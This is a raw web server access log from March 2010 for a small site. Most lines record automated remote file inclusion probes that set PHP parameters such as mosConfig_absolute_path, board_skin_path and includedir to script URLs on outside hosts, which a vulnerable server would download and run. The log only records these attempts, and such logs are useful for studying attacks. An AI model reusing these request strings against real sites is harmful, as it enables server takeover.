200.93.147.154 - - [05/Mar/2010:08:04:52 -0800] "GET /logs/access.log///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:08:10:23 -0800] "GET /logs/access.log///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:08:11:50 -0800] "GET /logs/access.log///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:08:12:16 -0800] "GET /logs/access.log///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
80.67.27.51 - - [05/Mar/2010:08:15:54 -0800] "GET /sourcedir=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
80.67.27.51 - - [05/Mar/2010:08:15:54 -0800] "GET /logs/access.log/sourcedir=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
80.67.27.51 - - [05/Mar/2010:08:15:54 -0800] "GET /logs/sourcedir=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:08:19:23 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:08:19:24 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:08:21:41 -0800] "GET /logs//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:08:21:41 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:08:21:41 -0800] "GET /appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:08:21:43 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:08:21:43 -0800] "GET /logs//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.144 - - [05/Mar/2010:08:21:43 -0800] "GET /appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.249.18.67 - - [05/Mar/2010:08:26:33 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
194.249.18.67 - - [05/Mar/2010:08:26:33 -0800] "GET /logs////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 1664 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
194.249.18.67 - - [05/Mar/2010:08:26:33 -0800] "GET ///////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:08:27:23 -0800] "GET /logs//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:08:27:23 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:08:27:23 -0800] "GET /appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
123.143.29.250 - - [05/Mar/2010:08:27:31 -0800] "GET /bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
123.143.29.250 - - [05/Mar/2010:08:27:31 -0800] "GET /logs/access.log//bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
123.143.29.250 - - [05/Mar/2010:08:27:31 -0800] "GET /logs//bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:08:28:36 -0800] "GET /logs//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:08:28:36 -0800] "GET /appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
121.101.214.54 - - [05/Mar/2010:08:28:36 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
69.163.150.203 - - [05/Mar/2010:08:28:37 -0800] "GET ///////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
69.163.150.203 - - [05/Mar/2010:08:28:37 -0800] "GET /logs////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 1664 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
69.163.150.203 - - [05/Mar/2010:08:28:37 -0800] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
188.93.10.36 - - [05/Mar/2010:08:36:13 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
188.93.10.36 - - [05/Mar/2010:08:36:13 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
188.93.10.36 - - [05/Mar/2010:08:36:13 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
66.102.237.18 - - [05/Mar/2010:08:37:05 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.102.237.18 - - [05/Mar/2010:08:37:05 -0800] "GET /send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.102.237.18 - - [05/Mar/2010:08:37:06 -0800] "GET /logs/send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.102.237.18 - - [05/Mar/2010:08:37:13 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.102.237.18 - - [05/Mar/2010:08:37:13 -0800] "GET /send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.102.237.18 - - [05/Mar/2010:08:37:13 -0800] "GET /logs/send_reminders.php?includedir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.55.227.145 - - [05/Mar/2010:08:37:35 -0800] "GET /logs//main.php?sayfa=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.55.227.145 - - [05/Mar/2010:08:37:35 -0800] "GET /main.php?sayfa=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.55.227.145 - - [05/Mar/2010:08:37:35 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
78.24.9.88 - - [05/Mar/2010:08:38:11 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
78.24.9.88 - - [05/Mar/2010:08:38:11 -0800] "GET /send_reminders.php?includedir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
78.24.9.88 - - [05/Mar/2010:08:38:11 -0800] "GET /logs/send_reminders.php?includedir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
123.143.29.250 - - [05/Mar/2010:08:41:36 -0800] "GET /logs/access.log%20%20//bbs////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
69.163.150.203 - - [05/Mar/2010:08:42:48 -0800] "GET /logs/access.log////////?mosConfig_absolute_path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:08:43:03 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:08:43:03 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:08:43:03 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:08:43:13 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:08:43:13 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
41.204.218.244 - - [05/Mar/2010:08:43:13 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.88.25.28 - - [05/Mar/2010:08:43:30 -0800] "GET / HTTP/1.1" 200 924 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.allattitudedoxies.com"
219.94.193.152 - - [05/Mar/2010:08:43:39 -0800] "GET /send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
219.94.193.152 - - [05/Mar/2010:08:43:39 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
219.94.193.152 - - [05/Mar/2010:08:43:39 -0800] "GET /logs/send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
219.94.193.152 - - [05/Mar/2010:08:46:08 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
219.94.193.152 - - [05/Mar/2010:08:46:09 -0800] "GET /logs/send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
219.94.193.152 - - [05/Mar/2010:08:46:09 -0800] "GET /send_reminders.php?includedir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
208.80.193.27 - - [05/Mar/2010:08:49:55 -0800] "GET / HTTP/1.0" 200 908 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; INFOAVE5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.allattitudedoxies.com"
218.55.227.145 - - [05/Mar/2010:08:53:26 -0800] "GET /logs/access.log//main.php?sayfa=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
78.24.9.88 - - [05/Mar/2010:09:03:27 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.249.18.67 - - [05/Mar/2010:09:12:01 -0800] "GET /logs//delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.249.18.67 - - [05/Mar/2010:09:12:01 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.249.18.67 - - [05/Mar/2010:09:12:01 -0800] "GET /delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:09:13:51 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1659 "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:09:13:51 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:09:13:54 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
208.80.193.27 - - [05/Mar/2010:09:15:25 -0800] "GET / HTTP/1.0" 200 908 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "allattitudedoxies.com"
194.249.18.67 - - [05/Mar/2010:09:17:26 -0800] "GET /delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.249.18.67 - - [05/Mar/2010:09:17:26 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
194.249.18.67 - - [05/Mar/2010:09:17:26 -0800] "GET /logs//delete_all.php?board_skin_path=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.243.44 - - [05/Mar/2010:09:32:17 -0800] "GET /logs/access.log%20%20//galeria.php?start=0&kategoria=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.243.44 - - [05/Mar/2010:09:32:17 -0800] "GET /logs//galeria.php?start=0&kategoria=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.243.44 - - [05/Mar/2010:09:32:17 -0800] "GET /galeria.php?start=0&kategoria=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:10:00:39 -0800] "GET /logs/access.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:10:11:48 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1659 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:10:11:48 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:10:11:49 -0800] "GET /logs/access.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:10:17:10 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:10:17:12 -0800] "GET /logs/access.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:10:17:12 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1659 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:10:39:01 -0800] "GET /config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:10:39:01 -0800] "GET /logs/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:10:39:01 -0800] "GET /logs/access.log%20%20/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:10:39:02 -0800] "GET /logs/access.log%20%20/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:10:39:02 -0800] "GET /config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:10:39:02 -0800] "GET /logs/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
124.49.100.254 - - [05/Mar/2010:10:42:30 -0800] "GET /logs/access.log%20%20//Mixer/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
124.49.100.254 - - [05/Mar/2010:10:42:30 -0800] "GET /logs//Mixer/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
124.49.100.254 - - [05/Mar/2010:10:42:30 -0800] "GET /Mixer/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:10:46:37 -0800] "GET /logs/access.log/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
173.212.202.130 - - [05/Mar/2010:10:47:03 -0800] "GET /logs/access.log/config.php?path_to_root=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
124.49.100.254 - - [05/Mar/2010:11:06:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
124.49.100.254 - - [05/Mar/2010:11:06:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
124.49.100.254 - - [05/Mar/2010:11:06:11 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
88.191.94.188 - - [05/Mar/2010:11:08:01 -0800] "GET /logs/access.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
88.191.94.188 - - [05/Mar/2010:11:08:01 -0800] "GET /logs///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1659 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
88.191.94.188 - - [05/Mar/2010:11:08:01 -0800] "GET //?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
94.124.120.61 - - [05/Mar/2010:11:08:34 -0800] "GET /logs/access.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
94.124.120.61 - - [05/Mar/2010:11:08:34 -0800] "GET /logs///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1659 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
94.124.120.61 - - [05/Mar/2010:11:08:34 -0800] "GET //?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "www.allattitudedoxies.com"
94.124.120.61 - - [05/Mar/2010:11:13:21 -0800] "GET /logs/access.log///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
124.49.100.254 - - [05/Mar/2010:11:13:38 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
88.191.94.188 - - [05/Mar/2010:11:13:40 -0800] "GET /logs/access.log///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:15:41 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:15:42 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:15:43 -0800] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:18:00 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:18:00 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:18:00 -0800] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:18:23 -0800] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:18:24 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:18:26 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:18:38 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [05/Mar/2010:11:18:41 -0800] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
